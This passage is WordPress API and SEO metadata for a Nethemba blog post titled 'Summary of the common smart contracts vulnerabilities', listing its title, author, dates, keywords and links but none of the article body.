security\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nethemba.com\/de\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sk-SK\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234\",\"name\":\"Pavol Lupt\u00e1k\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"sk-SK\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"caption\":\"Pavol Lupt\u00e1k\"},\"sameAs\":[\"https:\/\/www.nethemba.com\/\"],\"url\":\"https:\/\/nethemba.com\/sk\/author\/nethemba-admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Summary of the common smart contracts vulnerabilities - Nethemba","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/","og_locale":"sk_SK","og_type":"article","og_title":"Summary of the common smart contracts vulnerabilities - Nethemba","og_description":"Introduction Cryptocurrencies and blockchain technology gained a lot of attention in the last year due to increasing mainstream adoption and new use cases. Thanks to hundreds of completed ICOs launched on Ethereum platform, Solidity is one of the most popular languages for smart contracts development. With billions of dollars at play and relatively low-level of [&hellip;]","og_url":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/","og_site_name":"Nethemba","article_publisher":"https:\/\/www.facebook.com\/nethemba","article_published_time":"2018-05-25T07:49:34+00:00","article_modified_time":"2018-05-28T05:58:57+00:00","author":"Pavol Lupt\u00e1k","twitter_card":"summary_large_image","twitter_creator":"@nethemba","twitter_site":"@nethemba","twitter_misc":{"Autor":"Pavol Lupt\u00e1k","Predpokladan\u00fd \u010das \u010d\u00edtania":"16 min\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#article","isPartOf":{"@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/"},"author":{"name":"Pavol Lupt\u00e1k","@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234"},"headline":"Summary of the common smart contracts vulnerabilities","datePublished":"2018-05-25T07:49:34+00:00","dateModified":"2018-05-28T05:58:57+00:00","mainEntityOfPage":{"@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/"},"wordCount":3221,"commentCount":0,"keywords":["blockchain","crypto","cryptocurrencies","Ethereum","ICO","IT security","security audit","security vulnerabilities in Solidity","smart contracts","Solidity"],"articleSection":["Uncategorized @sk"],"inLanguage":"sk-SK","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/","url":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/","name":"Summary of the common smart contracts vulnerabilities - Nethemba","isPartOf":{"@id":"https:\/\/nethemba.com\/de\/#website"},"datePublished":"2018-05-25T07:49:34+00:00","dateModified":"2018-05-28T05:58:57+00:00","author":{"@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234"},"breadcrumb":{"@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#breadcrumb"},"inLanguage":"sk-SK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/nethemba.com\/sk\/summary-of-the-common-smart-contracts-vulnerabilities\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/nethemba.com\/sk\/domov\/"},{"@type":"ListItem","position":2,"name":"Summary of the common smart contracts vulnerabilities"}]},{"@type":"WebSite","@id":"https:\/\/nethemba.com\/de\/#website","url":"https:\/\/nethemba.com\/de\/","name":"Nethemba","description":"We care about your security","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nethemba.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sk-SK"},{"@type":"Person","@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234","name":"Pavol Lupt\u00e1k","image":{"@type":"ImageObject","inLanguage":"sk-SK","@id":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","caption":"Pavol Lupt\u00e1k"},"sameAs":["https:\/\/www.nethemba.com\/"],"url":"https:\/\/nethemba.com\/sk\/author\/nethemba-admin\/"}]}},"_links":{"self":[{"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/posts\/2791","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/comments?post=2791"}],"version-history":[{"count":0,"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/posts\/2791\/revisions"}],"wp:attachment":[{"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/media?parent=2791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/categories?post=2791"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nethemba.com\/sk\/wp-json\/wp\/v2\/tags?post=2791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}